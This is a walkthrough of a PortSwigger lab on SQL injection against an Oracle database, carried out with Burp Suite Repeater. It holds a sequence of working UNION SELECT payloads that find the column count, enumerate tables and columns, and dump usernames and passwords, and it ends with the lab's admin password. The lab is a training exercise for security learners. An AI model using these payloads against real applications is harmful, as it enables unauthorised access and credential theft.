SQL injection attack, listing the database contents on Oracle

https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle

Let's filter for Accessories.

Since we are proxying the traffic through Burp Suite, we can go to the Proxy > HTTP History tab to view this request.

Let's forward this request to the Repeater for further modification.

Once in the Repeater, let's set the category parameter to the following:

' UNION SELECT 'test' FROM dual--

Since the application returns an error, we know that the number of columns in the current query is more than 1.

Let's set the category parameter to the following:

' UNION SELECT 'test', 'test' FROM dual--

Now that we know the current query has two columns, we can start enumerating the tables.

' UNION SELECT table_name, NULL FROM all_tables--

Next, we need to find the columns present in the USERS_EABGJF table. We can do that by setting the category parameter to the following:

' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name='USERS_EABGJF'--

We can now retrieve the usernames and password from the USERNAME_LIVOZB and PASSWORD_XJPXQQ columns respectively.

For that we have to set the category parameter to the following:

' UNION SELECT USERNAME_LIVOZB, PASSWORD_XJPXQQ FROM USERS_EABGJF--

We can now login as the administrator using the following credentials:

Username

Password

administrator

ayzzulz0enewtllx1szu

We have solved the lab

Last updated 2 years ago